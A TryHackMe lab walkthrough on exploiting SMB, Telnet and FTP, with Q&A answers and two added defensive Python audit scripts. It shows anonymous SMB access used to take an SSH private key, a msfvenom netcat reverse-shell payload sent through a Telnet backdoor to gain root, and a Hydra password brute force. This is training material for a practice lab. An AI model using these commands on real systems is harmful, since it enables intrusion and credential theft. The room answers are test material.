Network Services - Common Services
The link for this lab is located here: https://tryhackme.com/room/networkservices
This room explores common Network Service vulnerabilities and misconfigurations on services such as SMB, Telnet and FTP - both explaining and exploiting each service.
Task 2 - Understanding SMB
SMB (Server Message Block Protocol) is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources.
Servers make file systems and other resources available to clients on the network.
The SMB protocol is known as a response-request protocol, meaning it transmits multiple messages between client and server to establish a connection. Clients connect to servers using TCP/IP, NetBEUI or IPX/SPX.
How Does SMB Work?
Once the PCs have established a connection to the server, clients can then send commands (known as SMBs) to the server to allow them to do various things like access shares, open/read/write files and more.
What Runs SMB?
Windows operating systems since Windows 95 have included client and server SMB protocol support. Samba, an open source server that supports the SMB protocol, was released for Unix systems.
Questions
Q1: What does SMB stand for?
A: Server Message Block
Q2: What type of protocol is SMB?
A: Response-Request
Q3: What do clients connect to servers using?
A: TCP/IP
Q4: What systems does Samba run on?
A: Unix
Task 3 - Enumerating SMB
Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation. Enumeration is ESSENTIAL for an attack to be successful - wasting time throwing exploits at a machine hoping it works is not worth it.
Enumeration can gather incredible amounts of information including:
usernames
passwords
network information
hostnames
application data
services
Typically, there are SMB share drives on a server that can be connected to and used to view or transfer files. SMB shares are often a good place to look for sensitive information.
Port Scanning
The first step in enumeration is conducting a port scan to gather as much starting information about the services as possible - the services running, their versions and possibly the OS can be detected.
In this room, we will use Nmap but feel free to use any other port scanner you are more comfortable with. For the initial scan, I will be using the Nmap switches “-A” which enables OS detection, version detection, script scanning and traceroute and “-p-” which will scan all 65535 ports.
Enum4Linux
Enum4Linux is a great tool used to enumerate SMB shares on Windows and Linux. It is essentially a wrapper around the tools in the Samba package and makes it easy to extract information from the target pertaining to SMB.
The syntax of Enum4Linux is very simple - enum4linux <options> <IP>
Some of the most useful options are:
-U (get userlist)
-M (get machine list)
-N (get namelist dump)
-S (get sharelist)
-P (get password policy information)
-G (get group and member list)
-A (all of the above)
Questions
Q1: Conduct an nmap scan of your choosing. How many ports are open?
A: For my scan, I chose to run "nmap -sS -A -p- -oA initial 10.10.28.183": a TCP SYN scan, with -A mainly for service version and OS detection, "-p-" to cover all ports and "-oA initial" to write the results in all three formats (XML, Normal, Grepable).
Q2: What port is SMB running on?
A: Reading the Nmap output, we see that ports 139 and 445 are running instances of Samba smbd (which also tells us the OS is Linux, since it is Samba rather than Windows SMB).
Q3: Conduct a full basic enumeration using Enum4Linux. What is the workgroup name?
A: Running "enum4linux -A 10.10.28.183" gives a very large amount of output. Combing through it, we can see our WORKGROUP near the top. Remember that -A performs a full basic enumeration (userlist, machine list, sharelist, etc.).
Q4: What comes up as the name of the machine?
A: Scrolling down the Enum4Linux output, we find the machine name in the section titled "OS Information". It is not labelled, but the machine name is the value highlighted in red.
Q5: What operating system version is running?
A: This is in the same section, OS Information, and this time it is clearly labelled.
Q6: What share sticks out as something we might want to investigate?
A: When gathering information about a machine, one of the key resources we want to look for is usernames or possibly credentials. Under the "Share Enumeration" section you will see all the shares available on the machine. To us, the profiles share looks very intriguing.
Task 4 - Exploiting SMB
While there are vulnerabilities such as CVE-2017-7494 that can allow remote code execution (RCE) by exploiting SMB, you are more likely to encounter a situation where the best way into a system is due to misconfigurations rather than outdated versions (although they do still occur!)
In the case of this room, we will exploit anonymous SMB shares, a very common misconfiguration that can give us information leading to a shell. To learn more about anonymous shares and SMB hacking, I'd recommend this website
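From the defender's side, the misconfiguration above usually comes down to a few lines in smb.conf. The following is an added example (mine, not part of the room or of Samba) that parses an smb.conf and reports every share a client could reach as guest and whether it is writable; the configuration it reads is constructed sample input, not the room's real file.

```python
"""Audit a Samba smb.conf for shares reachable without credentials.

Added example for this walkthrough, not part of the TryHackMe room or of Samba.
SAMPLE_SMB_CONF is constructed input, not the room's real configuration.
"""
import configparser

# Constructed smb.conf: a read-only guest share like "profiles", a guest-writable
# share, and a properly restricted one. "public" is Samba's synonym for "guest ok".
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba)
   map to guest = Bad User

[profiles]
   path = /home/profiles
   guest ok = yes
   read only = yes

[upload]
   path = /srv/upload
   public = yes
   writable = yes

[private]
   path = /srv/private
   valid users = cactus
   guest ok = no
"""

TRUE_VALUES = {"yes", "true", "1"}


def _is_true(value):
    return value.strip().lower() in TRUE_VALUES


def _load(conf_text):
    # smb.conf is ini-style; interpolation is off because Samba uses % macros.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(conf_text)
    return cp


def find_guest_shares(conf_text):
    """Return {share: writable} for every share with guest access enabled."""
    cp = _load(conf_text)
    findings = {}
    for share in cp.sections():
        if share.lower() == "global":
            continue
        sec = cp[share]
        if not _is_true(sec.get("guest ok", sec.get("public", "no"))):
            continue
        # Samba defaults to read only = yes; writable/writeable flips it. A
        # guest-writable share lets an anonymous client drop files, not just read.
        writable = (_is_true(sec.get("writable", sec.get("writeable", "no")))
                    or not _is_true(sec.get("read only", "yes")))
        findings[share] = writable
    return findings


def map_to_guest(conf_text):
    """Return [global] 'map to guest' (Samba default 'Never'). 'Bad User' maps
    unknown usernames such as anonymous to the guest account, which is what lets
    an empty password land on a guest-ok share."""
    cp = _load(conf_text)
    return cp["global"].get("map to guest", "Never") if cp.has_section("global") else "Never"
```

Run against the sample, find_guest_shares reports profiles as read-only guest access and upload as writable guest access, while private is not listed.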
Method Breakdown
From our enumeration stage, we know:
The SMB share location
The name of an interesting share (profiles)
SMBClient
SMBclient is a tool used to access SMB shares. It is pre-installed on Kali Linux and Parrot OS, but if you need to download it, you can find it here
We can remotely access the SMB share by using the syntax:
smbclient //<IP>/<SHARE>
Followed by the tags:
-U <name> (specifies the user)
-p <port> (specifies the port)
Questions
Q1: What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?
A: First of all, we know that the default port for SMB is 445. The rest is a matter of substituting the details we know into the syntax above, with the -U parameter for the user and the -p parameter for the port: smbclient //10.10.10.2/secret -U suit -p 445
Q3: Let's see if the interesting share (profiles) has been configured to allow anonymous access via the username anonymous, the share of profiles and using no password. Does the share allow anonymous access (Y/N)?
A: Referencing the command above, we know how to use smbclient to accomplish this. Simply change the share name from secret to profiles, change the user from suit to anonymous and leave the default port. When prompted for the password, just hit enter and you will be greeted with an SMB prompt - we have access!
Q4: Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
A: The SMB prompt is very similar to a Linux shell with regards to commands; typing "help" at the prompt will reveal all possible commands. There is an interesting text document. We can read it using the "more" command followed by the file name in quotation marks (because it contains spaces): more "Working From Home Information.txt"
We see that there are two possible names this folder can belong to - John Cactus and John. It is more likely that it is John Cactus this folder belongs to as he is the person being addressed in the SMB Share.
Q5: What service has been configured to allow him to work from home?
A: Reading the text document from the last question reveals that SSH access has been enabled on his account. SSH allows a user to remotely access servers and workstations, authenticating with credentials or cryptographic keys. It is the secure replacement for Telnet.
Q6: Now we know this, what directory on the share should we look in?
A: We can determine that the folder we want is ".ssh", as it has the same name as the service configured for John Cactus. A quick Google search will lead to more information about this folder - if you want more information, click here
Q7: This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
A: The ".ssh" directory contains two keys - a private key (id_rsa) and a public key (id_rsa.pub). Anyone with a copy of the public key can encrypt data which can then only be read by the holder of the corresponding private key. Therefore, the private key (id_rsa) is the most important one to us.
Q8: Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
A: First, we need to download the private key to our own machine. There are various ways to do this, but the simplest is the built-in SMB command "get", which downloads the specified file to our working directory. Next, we have to change the permissions of the private key. SSH is very strict about private key permissions and requires that only you can read (mode 400) or read and write (mode 600) the file. So, let's change the permissions to 600 before using it.
Now that we have the RSA key and the right permissions, we need one more thing - the username. Now, there are two ways to do this. First, we could go through and guess all the common usernames for people - first-name, first-name-last-name, last-name, first-initial-last-name
However, there is a neat little trick here. If you go back to the SMB share and read the public key (id_rsa.pub) via the more command (more id_rsa.pub) you will actually see something very interesting at the end of the file
As you can see at the end, there is a username and hostname (cactus = username, polosmb = hostname). From this, we can determine that the username is cactus saving us some time. All that is left for us to do now is connect using the RSA key instead of a password and we will be in.
To connect to a remote host using an RSA key, we use the command "ssh -i id_rsa [username]@[ip]". The "-i" parameter specifies the identity (private key) file to use, here id_rsa. Knowing this, we can simply use the username cactus and the IP of your target to connect.
As you can see we are now logged in. All that is left is to grab the flag. Doing a simple "ls" command will show a text file. Inside, you will find your flag for this task.
Task 5 - Understanding Telnet
Telnet is an application protocol which allows you to connect and execute commands on a remote machine hosting a Telnet server. The telnet client will establish a connection with the server. The client will then become a virtual terminal - allowing you to interact with the remote host.
Telnet, however, sends ALL messages in clear text and has no specific security mechanisms. In many real-world environments, Telnet has been replaced by SSH.
Telnet works by the user connecting to the server using the Telnet protocol which means entering “telnet” into a terminal. The user then executes commands on the server using specific Telnet commands in the Telnet prompt. To connect to a Telnet server you can use the syntax:
telnet <IP> <port>
Questions
Q1: What is Telnet?
A: Application Protocol
Q2: What has slowly replaced Telnet?
A: SSH
Q3: How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
A: Looking above, we know the syntax is simply the telnet command with the IP first and the port second, hence our command would be: telnet 10.10.10.3 23
Q4: The lack of what means that all Telnet communication is in plaintext?
A: Encryption
Task 6 - Enumerating Telnet
Again, the first step is doing a port scan to find out as much information about the services, applications, structure and possible OS of the target. As discussed in the “Enumerating SMB” section, I will be performing the following Nmap scan (feel free to run your own with different flags):
nmap -sS -A -p- -oA initial 10.10.197.79
Questions
Q1: How many ports are open on the target machine?
A: Running our scan and looking at the results, we can see that only 1 port is open - port 8012.
Q2: What port is this?
A: Looking at the results from Q1, we can see it is port 8012.
Q3: This port is unassigned but still lists the protocol it is using, what protocol is this?
A: Looking at the Nmap scan, next to the port number there is a "/" followed by the protocol in use. In this case, "/tcp".
Q4: Now re-run the nmap scan without the "-p-" tag, how many ports show up as open?
A: Omitting "-p-" makes Nmap scan only its 1000 most common ports by default. In this case, our scan returns no open ports. Here we see that by assigning telnet to a non-standard port, it is NOT part of the most common ports. It is important to try every angle when enumerating!
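A practical way to act on this lesson is to go back to the grepable output that "-oA initial" already wrote (initial.gnmap) and check every open port against the port its service normally uses, so a service parked on an odd port stands out in an audit. The script below is an added example, not part of the room or of Nmap; its SAMPLE_GNMAP lines are constructed in the grepable format, and the EXPECTED_PORTS table is my assumption about what counts as standard.

```python
"""Parse Nmap grepable output (the .gnmap file written by -oA) and flag open
ports that deserve a second look.

Added example for this walkthrough; it is not part of the room or of Nmap.
SAMPLE_GNMAP is constructed in the grepable format, not real scan output.
"""
import re

# Constructed .gnmap lines. Each port entry in the "Ports:" field has the layout
# port/state/protocol/owner/service/rpcinfo/version/ and entries are comma-separated.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -sS -A -p- -oA initial 10.10.28.183
Host: 10.10.28.183 ()\tStatus: Up
Host: 10.10.28.183 ()\tPorts: 22/open/tcp//ssh//OpenSSH/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, 445/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/\tIgnored State: closed (65532)
Host: 10.10.197.79 ()\tPorts: 8012/open/tcp//telnet///\tIgnored State: closed (65534)
Host: 10.10.176.18 ()\tPorts: 21/open/tcp//ftp//vsftpd/, 80/open/tcp//http//Apache httpd/\tIgnored State: closed (65533)
# Nmap done -- 3 IP addresses (3 hosts up) scanned
"""

# Assumed table of ports a service is normally served on; anything else is
# reported as a non-standard port.
EXPECTED_PORTS = {
    "ftp": {21}, "ssh": {22}, "telnet": {23}, "http": {80, 8080},
    "netbios-ssn": {139, 445}, "microsoft-ds": {445},
}

PORT_ENTRY = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")


def parse_gnmap(text):
    """Return (host, port, proto, service, version) for every open port."""
    results = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the tab before "Ignored State:" (if present).
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for m in PORT_ENTRY.finditer(ports_field):
            port, state, proto, service, version = m.groups()
            if state == "open":
                results.append((host, int(port), proto, service, version))
    return results


def audit(results):
    """Return (host, port, service, reason) for ports worth investigating.

    Two reasons: a recognised service on an unexpected port (the Task 6 lesson,
    where Telnet on 8012 is missed by a default top-1000 scan), and an open
    port whose service Nmap could not identify at all.
    """
    flagged = []
    for host, port, proto, service, version in results:
        if service in ("", "unknown"):
            flagged.append((host, port, service, "unidentified service"))
        elif service in EXPECTED_PORTS and port not in EXPECTED_PORTS[service]:
            flagged.append((host, port, service, "non-standard port"))
    return flagged
```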
Q6: Based on the title returned to us, what do we think this port could be used for?
A: Looking at the output, we see an interesting string - "SKIDY'S BACKDOOR" - which seems unusual. A backdoor refers to any method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network, or software application.
Q7: Who could it belong to?
A: The string "SKIDY'S BACKDOOR" seems to indicate that a user called Skidy set up a backdoor on this machine and is using it himself.
Task 7 - Exploiting Telnet
Telnet is insecure due to its lack of cryptography - it sends all its communication in plaintext and also has poor access control. There are various CVEs for Telnet client and server systems you could check on these sites:
A CVE (Common Vulnerabilities and Exposures) is a list of publicly disclosed computer security flaws. However, in the real world you are far more likely to find a misconfiguration in how it has been configured or is operating that will allow exploitation.
From the enumeration stage, we know:
There is a poorly hidden telnet service running
The service itself is a backdoor
Possible username of Skidy implicated
Using this information, we can connect to the Telnet port to maybe get a reverse shell on the machine. You can connect using Telnet via the following syntax:
telnet [ip] [port]
Before we run this, we need to discuss what a reverse shell is. A “shell” is simply described as a piece of code or program that can be used to gain code or command execution on a device.
A reverse shell is a type of shell in which the target communicates BACK to us on our machine. Our machine has a listening port on which it receives the connection resulting in code or command execution.
First, let’s connect using Telnet via the following command:
telnet 10.10.197.79 8012
Questions
Q2: We have an open telnet connection. What welcome message do we receive?
A: The very last line reveals our welcome message. In this case, it says "SKIDY'S BACKDOOR".
Q3: Try executing some commands. Do we get a return on any input we enter into the telnet session (Y/N)?
A: Typing .HELP reveals something back to us. However, typing any other command gives us nothing back, so no return from our input is given. Using the command "sudo tcpdump ip proto \\icmp -i tun0", we start our listener looking for ICMP traffic (pings).
Next, try pinging our local machine (my Kali's tun0 IP address) from the target machine using the .RUN command: .RUN ping 10.11.3.112 -c 1 (the -c 1 sends only one ping).
As we can see, the listener successfully picks up the pings from the target.
This means we can execute system commands and we can reach our local machine from the target.
Q6: Do we receive any pings?
A: Looking at the last step, we know we can ping our local machine from the target via the Telnet session, so we do receive pings.
Now, we can generate a reverse shell payload using msfvenom. This generates and encodes a netcat reverse shell for us. The syntax is as follows (your lhost IP will be different):
msfvenom -p cmd/unix/reverse_netcat lhost=10.11.3.112 lport=4444 R
Here is what it all means:
msfvenom (the tool to create custom payloads/shells)
-p (indicates our payload - in this case cmd/unix/reverse_netcat)
lhost (our machine’s IP address)
lport (port on OUR machine to listen for connections)
R (export the payload in raw format)
Q8: What word does the generated payload start with?
A: Running this msfvenom command reveals the full command that we can run on the target machine. As we can see, the first word is mkfifo.
Next, we need to start a netcat listener on our local machine. This is what will "catch" the shell from the target machine when it connects back to our machine on the port we specified above (in my case, 4444). To run a netcat listener, we use the command
nc -lvp 4444
Where:
-l (stands for listen mode)
-v (means verbose output)
-p (specifies the port)
Q9: What would the command look like for the listening port?
A: We know that the syntax for the command is "nc -lvp [port number]", so our example would be "nc -lvp 4444".
Now that our netcat listener is running and waiting for a connection on port 4444, we can copy and paste the raw command from msfvenom (starting from mkfifo) into our Telnet session on the target machine. When run, it should connect back to our Kali machine on port 4444 and give us a shell.
Once it has run, we can check our netcat listener and we should see the target machine has connected to us.
Now, we can confirm who we are running as on this machine by typing the id command.
Perfect. We are root!
Q11: What are the contents of the flag.txt file?
A: A simple Linux command - ls - will reveal what is in this directory. There is a flag.txt file. Simply read the flag.txt file and you will get the flag.
Task 8 - Understanding FTP
FTP (File Transfer Protocol) is a protocol used to allow remote transfer of files over a network. It uses a client-server model and relays commands and data in an efficient way.
A typical FTP session operates using two channels:
a command or control channel
a data channel
The command channel is used for transmitting and replying to commands, while the data channel is used for transferring data.
FTP clients initiate a connection with the server; the server validates the login credentials and then opens the session. When the session is open, the client may execute FTP commands on the server.
FTP servers can support Active and Passive connections:
Active - the client opens a port and listens; the server is required to actively connect to it
Passive - the server opens a port and listens (passively); the client connects to it
The separation of channels is a way of being able to send commands without having to wait for the current data transfer to finish.
For more details on the technicalities of FTP, you can click here
Questions
Q1: What communications model does FTP use?
A: Client-Server
Q2: What is the standard FTP port?
A: 21
Q3: How many modes of FTP connection are there?
A: 2 - Active and Passive
Task 9 - Enumerating FTP
By now, you should be comfortable performing a port scan effectively. For this stage, we will exploit an anonymous FTP login to see what files we can access and whether they contain any interesting information.
It's worth noting that some vulnerable versions of in.ftpd and other FTP server variants return different responses to the "cwd" command depending on whether the requested home directory exists.
These can be exploited because you can issue "cwd" commands before authentication, and if a home directory exists, there is likely a user account to go with it. This bug is mainly found in legacy systems but is still worth noting. You can read more about it here
Questions
Q1: How many ports are open on the target machine?
A: Using my trusty nmap scan (nmap -sS -A -p- -oA initial [IP]), we can see that ports 21 and 80 are open.
Q2: What port is FTP running on?
A: Looking at our output, we can see that port 21 is running FTP. Additionally, we know from above that port 21 is the default port for FTP.
Q3: What variant of FTP is running?
A: Looking at the scan results for port 21, under the VERSION column, you will see the variant is vsftpd. Now we know what type of FTP server we are dealing with. The next step is to check whether we are able to log in anonymously to the FTP server. To do this, we use the simple syntax:
ftp [IP]
When prompted for a username, type "anonymous" and for the password use "anonymous" as well. When logged in, you can type "help" to get a list of commands you can use (you'll notice most of them are simple Linux commands).
Q4: What is the name of the file in the anonymous FTP directory?
A: Using the ls command, we can see there is a file in the directory called PUBLIC_NOTICE.txt.
Q4: What do we think a possible username could be?
A: To read the file, we first download it to our local machine (good practice). This is done with the "get" command followed by the filename: get PUBLIC_NOTICE.txt. It will download to the directory you started in when connecting to the FTP server. Once you are in that directory, you can simply "cat" the file to read it locally.
After reading the file, we can see it is written by mike - this could be the username on this machine.
Now that we have a possible username for the FTP server, we can possibly login or crack Mike’s password using Hydra.
Task 10 - Exploiting FTP
Similar to Telnet, FTP's command and data channels are unencrypted. With FTP data sent in plaintext, if a Man in the Middle attack took place, an attacker could reveal anything sent (even passwords).
An amazing article written by JScape demonstrates and explains this using ARP Poisoning.
When looking at an FTP server from our position, an avenue we can exploit is weak or default passwords.
From our enumeration stage, we know the following:
There is an FTP server running
We have a possible username of mike
Using this information, we can try cracking the password of the FTP server using the mike username.
To crack a password, we can use a tool called Hydra. Hydra is an online password cracking tool which performs rapid dictionary attacks against more than 50 protocols including Telnet, HTTP, SMB and much more!
The syntax for using Hydra to bruteforce a password with a given username is the following:
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.176.18 ftp
Note that you may not have the rockyou.txt wordlist on your machine. This wordlist is VERY commonly used in CTFs and TryHackMe rooms, so it is vital. If you do not have it downloaded, you can find it here.
The syntax used above uses the following flags:
-t 4 (specifies the number of parallel connections per target)
-l [user] (username of person you are trying to crack)
-P [path to wordlist] (points to the wordlist you want to use)
-vV (sets verbose mode, shows every login+password combination)
[IP] (specifies target machine)
ftp (sets protocol to FTP)
Questions
Q1: What is the password for the user mike?
A: Running the command specified above on our attacking machine starts Hydra. After a couple of seconds, you will see a highlighted combination revealing the successful password for mike.
Now that we have a username and password, we can once again connect to the machine using the ftp 10.10.176.18 command, but this time with the username mike and the password password. Once logged in, we can list the files to see what there is in Mike's directory.
Q3: What is ftp.txt?
A: Once again, we see that there is a file called "ftp.txt" located in this directory. We can download it using the "get ftp.txt" command. Once downloaded, we can simply navigate to the directory it was downloaded to and "cat" it out to reveal our flag for this room.
Task 11 - Expanding Your Knowledge
And that's it! You've successfully completed this room. Congratulations. If you want to expand your skills further, check out more TryHackMe rooms or check out some of the following links: